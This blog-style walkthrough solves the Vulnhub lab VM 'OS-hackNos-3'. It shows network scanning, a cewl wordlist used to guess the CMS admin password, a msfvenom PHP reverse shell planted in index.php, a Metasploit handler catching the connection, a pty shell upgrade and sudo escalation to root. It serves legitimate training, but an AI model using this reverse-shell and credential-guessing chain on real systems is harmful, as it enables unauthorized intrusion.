OS-hackNos-3 Walkthrough Vulnhub CTF

Today We are solving os hacknos 3 vulnhub VM is created by Rahul Gehlaut and finding our 2 Flag first user And the second root ()

Every time-Solving our first step is scanning our network with the most popular network scanning kali Linux tool

netdiscover (netdiscover is scanning the full network and show all connected users).

Network Scanning

netdiscover
OS-hackNos-3 walkthrough

After finding the target machine IP address we need to

perform a Nmap port scanning and finding which ports are open target machine

Port Scanning

nmap -A 192.168.1.12
OS-hackNos-3 walkthrough

We see target machine two ports are open (22 port running ssh server) and port (80 running httpd service) and

we see target machine http_title now see the request our browser

I am opening the HTTP request in browser and we see websec directory after enumeration the source code

I see websites websec directory running on cms application

OS-hackNos-3 walkthrough

sometime later_not see any Vulnerable plugin, thems And website footer see the contact email address

next step is finding a password to log in with admin account creating a short wordlist with cewl wordlist generator

cewl http://192.168.1.12/websec -d 2 -w wordlist.txt
cat wordlist.txt

I am trying one by one password for login admin account after trying 10-15 password we Succesful login admin account

After login admin account uploading a php reverse shell click the Content button and click file manager

creating a msfvenom php reverse and paste it target index.php default web page file and click save button to save

starting our Metasploit msfconsole payload listener

and opening default web http://192.168.1.12/websec web browser and we got a meterpreter reverse connection

  • msfconsole
  • use exploit/multi/handler
  • (our payload name) set payload php/meterpreter/reverse_tcp
  • set lhost 192.168.1.5
  • set lport 4545
  • run

python importing for proper shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

After enumeration many directories we find a database file cat command to open the file and we see last line file fackespreadsheet encode text I am decoding the text online fackespreadsheet decoder

OS-hackNos-3 walkthrough

Decode Spreadsheet copy database text file and paste the website and click decode button to decode the file

we see decode text [email protected]@

OS-hackNos-3 walkthrough

try the text for user blackdevil user password switching account And success full login with blackdevil account

su blackdevil
OS-hackNos-3 walkthrough

Going the see our first user flag blackdevil directory

cat user.txt

sudo -l command to we see sudoers file entry blacdevill user is run any command without password root

sudo -l
sudo su
OS-hackNos-3 walkthrough
Find our last root flag root directory root.txt
cd /root
cat root.txt
OS-hackNos-3 walkthrough

Os-hackNos-2 Walkthrough see here

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →